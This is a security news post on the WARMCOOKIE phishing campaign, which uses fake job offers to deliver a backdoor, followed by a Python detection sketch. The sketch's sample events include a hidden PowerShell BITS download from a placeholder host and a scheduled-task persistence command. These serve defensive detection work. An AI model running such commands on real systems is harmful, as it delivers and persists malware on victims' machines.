WARMCOOKIE: click on a job and get a virus

Tomcat

How long have you been unable to find a job? This is the fault of cybercriminals!

Cybersecurity researchers from Elastic Security Labs revealed details of an active phishing campaign that uses employment topics to distribute malware called WARMCOOKIE.

"Each WARMCOOKIE sample is compiled with a hard-coded IP address and RC4 key," says Daniel Stepanic, an analyst at Elastic Security Labs. The malware is capable of fingerprinting infected machines, taking screenshots, and downloading additional malware.

Since late April and up to the present, researchers have observed a large-scale malicious operation that uses emails sent in the name of large recruitment companies such as Hays, Michael Page and PageGroup. Researchers track the attackers' activity under the identifier REF6127.

The attack begins with an invitation to the prospective candidate to click a link in the email to view a suitable vacancy. After following the link, the visitor has to solve a CAPTCHA to load the promised document. As a result, a JavaScript file named "Update_23_04_2024_5689382.js" is downloaded to the victim's computer.


"This hidden script runs PowerShell, which initiates the WARMCOOKIE download," Elastic explains. To load the malware, the PowerShell script uses the Windows Background Intelligent Transfer Service (BITS).

A key element of the malicious campaign is the use of compromised infrastructure to host the initial phishing URL, which redirects victims to the desired page.

WARMCOOKIE, a Windows DLL, goes through a two-stage process: it establishes persistence on the system through a scheduled task and then runs its core functionality, first performing anti-analysis checks to evade detection.

[Image: WARMCOOKIE attack scheme]

The backdoor is designed to collect extensive information about the infected host. It supports commands for reading and writing files, executing commands via CMD, getting a list of installed apps, and taking screenshots.

"WARMCOOKIE is a newly discovered malware that is gaining popularity and is being used in various malware campaigns around the world," Elastic says.

The topic of job searching and hiring often serves as a pretext for hackers to spread malware. For example, just yesterday we covered the malicious campaign "More_eggs", in which attackers targeted recruiters.

A recruiter's direct responsibility is to find suitable candidates and invite them to an interview. However, in the course of their normal work, one of these specialists may well let a cunning attacker into the corporate network without even realizing it.

That is why increasing the information security awareness of all employees, as well as the use of advanced security systems, is the key to a high level of cybersecurity in any enterprise.
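As an added illustration of what "advanced security systems" can actually look for in this chain, the following Python sketch (an example written for this post, not Elastic's code or any artifact of the campaign) runs a few detection checks over a handful of constructed Sysmon-style process-creation events. It flags the three behaviours the article describes: a script host executing a .js file and spawning PowerShell, PowerShell using BITS to fetch a payload, and a scheduled task whose action points into a user-writable directory. The event field names (pid, ppid, image, cmdline), the sample command lines, the placeholder download URL and the task action path are all assumptions chosen for the sample rather than a real log schema or real indicators.

```python
"""Detection sketch for the delivery chain described in the post.

Added example, not Elastic's code or a campaign artifact. The event format
(dicts with pid/ppid/image/cmdline) is an assumption; the sample events and
all hosts/paths in them are constructed for this illustration.
"""
import re
from typing import Dict, List

# Windows script hosts that would run the dropped .js file.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# PowerShell driving BITS either through the cmdlet or the legacy CLI.
BITS_PATTERN = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.I)

# Directories a non-admin user can write to; a task action living here is suspicious.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads)|programdata|windows\\temp)\\", re.I
)


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[str]:
    """Return one finding string per suspicious event, in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[str] = []
    for e in events:
        image = _basename(e["image"])
        cmd = e["cmdline"]
        parent = by_pid.get(e["ppid"])

        # 1. PowerShell spawned by a script host that was executing a .js file.
        if (
            image == "powershell.exe"
            and parent is not None
            and _basename(parent["image"]) in SCRIPT_HOSTS
            and re.search(r"\.js\b", parent["cmdline"], re.I)
        ):
            findings.append(
                f"pid {e['pid']}: PowerShell spawned by "
                f"{_basename(parent['image'])} running a .js file"
            )

        # 2. PowerShell using BITS to download something.
        if image == "powershell.exe" and BITS_PATTERN.search(cmd):
            findings.append(f"pid {e['pid']}: PowerShell download via BITS")

        # 3. Scheduled task created with an action in a user-writable path.
        if (
            image == "schtasks.exe"
            and re.search(r"/create\b", cmd, re.I)
            and USER_WRITABLE.search(cmd)
        ):
            findings.append(
                f"pid {e['pid']}: scheduled task pointing at user-writable path"
            )
    return findings


# Constructed sample: one chain matching the post's description plus one benign
# PowerShell launch. The URL and DLL path are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Update_23_04_2024_5689382.js"'},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"Start-BitsTransfer "
                "-Source http://PLACEHOLDER-HOST/x -Destination C:\\ProgramData\\update.dll\""},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn Updater /tr "C:\ProgramData\update.dll" /sc minute'},
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},  # benign: no script-host parent, no BITS
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

Run against the sample, the benign PowerShell launch (pid 500) produces nothing, while the constructed chain yields three findings: the script-host-to-PowerShell parent relationship, the BITS transfer, and the task created from ProgramData. Each check on its own is noisy in a real environment; the value comes from correlating them along the parent-process chain, which is why the sample keeps ppid.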
 